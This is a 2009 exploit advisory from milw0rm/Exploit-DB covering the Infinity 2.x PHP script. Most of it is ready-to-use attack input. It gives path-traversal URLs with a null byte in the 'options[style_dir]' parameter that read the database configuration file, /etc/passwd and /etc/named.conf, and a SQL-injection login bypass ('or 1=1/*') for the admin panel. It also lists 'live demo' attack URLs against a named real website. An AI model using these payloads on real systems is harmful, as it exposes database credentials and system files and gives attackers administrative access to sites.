Infinity 2.x - 'options[style_dir]' Local File Disclosure

EDB-ID:

9462


Platform:

PHP

Published:

2009-08-18

------------------Infinity <= v2.X.X  Local File Disclosure / Auth Bypass Vulnerabilities-------------------------
   #     ####     #     ###      ##   ###  ####  ####  ###   ## ###   ####  ####   ###     #    ### ####  ######
   ##     #  #    ##     # #    # #  #  #   # #   #  #  #    #   #   #    #  # #  #  #     ##    #   # # #  #  #
   # #    #  #    # #    # #    # #  #      #     #  #   #   #   #  #        #    #        # #   #   #      #  
  #  #    ###    #  #    ###   #  #   ##    ###   ###    #  #    #  #        ###   ##      #  #  #   ###    #  
  ####    #  #   ####    #  # ######    #   #     #  #    # #    #  #        #       #     #   # #   #      #  
 #   #    #   # #   #    #  #     # #   #   #     #   #   ##     #   #    #  #   #   #     #    ##   #      #  
##    ## ###   ##    ## ####     ### ###   ####  ###   #   #    ###   ####  ####  ###   # ###    #  ####   ###
    
#----------------------------------------------------------------------------------------------------------------
Script : Infinity
version : 2.X.X
Language: PHP
Site: http://www.dimofinf.net/
Author: SwEET-DeViL

need magic_quotes_gpc = Off  <-----(<>

----------------------------------------------------------------------------------------------------------------

- +[LFD]

#Exploit:

http://WWW.Site.Com/inf/?options[style_dir]=../include/db.php%00
http://WWW.Site.Com/inf/?options[style_dir]=../../../../../../etc/passwd%00
#
###
#
#----------------------------------------------------------------------------------------------------------------
- +[AB]

http://WWW.Site.Com/inf/cp


#Exploit:


username : 'or 1=1/*

password : SwEET-DeViL

#----------------------------------------------------------------------------------------------------------------
#
###
#
- - +[Live Demo] : >

http://www.alihammadi.com/html/?options[style_dir]=../include/db.php%00
http://www.alihammadi.com/html/?options[style_dir]=../../../../../../etc/named.conf%00


/-------------www.arab4services.net-----------------\
|+------------------------------------------------+ |
||          SwEET-DeViL & viP HaCkEr              | |
||            gamr-14(at)hotmail.com              | |
|+------------------------------------------------+ |
\---------------------------------------------------/


# milw0rm.com [2009-08-18]